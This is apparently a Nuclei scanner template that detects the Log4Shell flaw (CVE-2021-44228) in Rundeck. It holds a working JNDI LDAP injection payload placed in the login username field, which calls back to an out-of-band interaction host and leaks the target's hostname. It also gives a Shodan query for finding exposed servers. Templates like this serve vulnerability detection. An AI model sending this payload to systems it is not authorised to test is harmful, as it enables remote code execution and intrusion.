id: rundeck-log4j info: name: Rundeck - Remote Code Execution (Apache Log4j) author: DhiyaneshDK severity: critical description: Rundeck is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. reference: - https://docs.rundeck.com/docs/history/CVEs/log4j.html - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: verified: true max-request: 1 shodan-query: title:"Rundeck" tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast variables: rand1: '{{rand_int(111, 999)}}' rand2: '{{rand_int(111, 999)}}' http: - raw: - | POST /j_security_check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Origin: {{BaseURL}} Connection: close Referer: {{BaseURL}}/user/login j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin matchers-condition: and matchers: - type: word part: location words: - '{{BaseURL}}/user/error' - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' extractors: - type: kval kval: - interactsh_ip - type: regex part: interactsh_request group: 2 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' - type: regex part: interactsh_request group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # digest: 4b0a00483046022100f28c4f03fbbb9b76ef6c99fbac48b12f3296bb07f62382ba74c3266125befe0c02210090671448fbc9e26f8527085dbce7bfe0cab0483aa3100d8d23a2437fe37147c4:922c64590222798bb761d5b6d8e72950